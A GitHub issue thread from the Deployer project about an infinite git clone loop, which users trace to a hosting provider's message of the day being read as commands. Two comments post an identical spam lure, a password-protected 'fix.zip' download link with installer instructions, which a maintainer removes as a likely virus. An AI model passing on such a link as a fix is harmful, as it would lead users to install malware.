### ISSUE TITLE
Git clone loop

### ISSUE THREAD

**Issue by nmdgent-jefverme** [deployphp/deployer#3880]
- Deployer version: 7.4
- Deployment OS: Ubuntu 18.04

Hi everyone

I ran into an issue today when I was upgrading an old project from deployer version 6 to version 7. Once the script gets to the update_code task, it gets stuck in an infinite loop:

[staging] Cloning into bare repository '/var/www/staging.woonhavenantwerpen/wwwroot/.dep/repo'...
[staging] ssh '-A' '-o' 'ControlMaster=auto' '-o' 'ControlPersist=60' '-o' 'ControlPath=~/.ssh/staging.woonhavenantwerpen@woonhaven.be' 'staging.woonhavenantwerpen@woonhaven.be' ': XXXXXXXXXXXXXXXXXXXX; bash -ls'
[staging] run cd /var/www/staging.woonhavenantwerpen/wwwroot/.dep/repo && (/usr/bin/git config --get remote.origin.url)
[staging] git@bitbucket.org:newance/woonhaven.git
[staging] ssh '-A' '-o' 'ControlMaster=auto' '-o' 'ControlPersist=60' '-o' 'ControlPath=~/.ssh/staging.woonhavenantwerpen@woonhaven.be' 'staging.woonhavenantwerpen@woonhaven.be' ': XXXXXXXXXXXXXXXXXXXX; bash -ls'
[staging] run cd /var/www/staging.woonhavenantwerpen/wwwroot && (rm -rf /var/www/staging.woonhavenantwerpen/wwwroot/.dep/repo)
[staging] ssh '-A' '-o' 'ControlMaster=auto' '-o' 'ControlPersist=60' '-o' 'ControlPath=~/.ssh/staging.woonhavenantwerpen@woonhaven.be' 'staging.woonhavenantwerpen@woonhaven.be' ': XXXXXXXXXXXXXXXXXXXX; bash -ls'
[staging] run cd /var/www/staging.woonhavenantwerpen/wwwroot && ([ -d /var/www/staging.woonhavenantwerpen/wwwroot/.dep/repo ] || mkdir -p /var/www/staging.woonhavenantwerpen/wwwroot/.dep/repo)
[staging] ssh '-A' '-o' 'ControlMaster=auto' '-o' 'ControlPersist=60' '-o' 'ControlPath=~/.ssh/staging.woonhavenantwerpen@woonhaven.be' 'staging.woonhavenantwerpen@woonhaven.be' ': XXXXXXXXXXXXXXXXXXXX; bash -ls'
[staging] run export GIT_TERMINAL_PROMPT='0' GIT_SSH_COMMAND='ssh -o StrictHostKeyChecking=accept-new'; cd /var/www/staging.woonhavenantwerpen/wwwroot && ([ -f /var/www/staging.woonhavenantwerpen/wwwroot/.dep/repo/HEAD ] || /usr/bin/git clone --mirror  git@bitbucket.org:newance/woonhaven.git /var/www/staging.woonhavenantwerpen/wwwroot/.dep/repo 2>&1)

Does anyone know what could be going wrong here?

## Upvote & Fund

- We're using [Polar.sh](https://polar.sh/deployphp) so you can upvote and help fund this issue.
- We receive the funding once the issue is completed & confirmed by you.
- Thank you in advance for helping prioritize & fund our backlog.

<a href="https://polar.sh/deployphp/deployer/issues/3880">
<picture>
  <source media="(prefers-color-scheme: dark)" srcset="https://polar.sh/api/github/deployphp/deployer/issues/3880/pledge.svg?darkmode=1">
  <img alt="Fund with Polar" src="https://polar.sh/api/github/deployphp/deployer/issues/3880/pledge.svg">
</picture>
</a>

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Schrank** [comment]
I deleted the last two comments, because I assume it is some kind of virus or shit. If I'm wrong, sorry, I have a copy in my inbox

**Comment by nmdgent-jefverme** [comment]
> I deleted the last two comments, because I assume it is some kind of virus or shit. If I'm wrong, sorry, I have a copy in my inbox

No its oke, pretty sure it was spam as well! Thanks

**Comment by btumbleson** [comment]
Running into the same issue trying to deploy a new site. 

Deployer version: 7.3.1
Deployment OS: Ubuntu 20.04.6
Running `dep deploy` from: Ubuntu (WSL) - _I only mention this as trying to run deploy from native Windows (using Cmder/ Powershell) throws a host of other errors related to multithreading that aren't related._

My initial thought was it was a permission issue (in my case, the repo is on Github), but I can successfully `git clone` using the same account I've instructed deployer to use.

I also find that if I try to run `dep deploy` right after interrupting the above deploy, I get:

` fatal: destination path '/var/www/mysitehere/data/deploy/.dep/repo' already exists and is not an empty directory.`

My hunch is this is moreso a function of not having the "cleanup" steps run at the end of a deployment since it was interrupted, so potentially also not relevant.

**Comment by johannessmit** [comment]
I ran into the same issue as well, but I also found a solution (and spotted the cause of the issue in the first place):

Deployer Version: 7.4.0
Deployment OS: 20.04.6 LTS

The issue on our side was caused on our side by an MOTD of our hosting provider, once we requested to disable the MOTD, everything worked as it is supposed to work.

The issue it created (and I do believe that the hosting provider does something special with their Message of the day), was that that message was also received by the ssh session of deployer, and it tried to execute that message as commands (which of course doesn't work).

**Comment by btumbleson** [comment]
Confirming @johannessmit observation solved it for me. In my case, my server running Fastpanel had a perpetual welcome message being loaded. Removing that allowed me to proceed.

**Comment by johannessmit** [comment]
It might be out of place for me to suggest, but isn't it an idea to add this to the known bugs section of the documentation?

This is, for an user of Deployer, quite an frustrating and bizarre thing to happen. While Deployer itself is an amazing piece of tooling, debugging this can take several hours and then still it feels like a lucky guess (I had the luxury of a coworker that had the experience already)

**Comment by antonmedv** [comment]
We need to add motd detection

**Comment by johannessmit** [comment]
@antonmedv I fully agree, but if in the end that seems to quite hard, it would help people if it's documented as a known issue :)
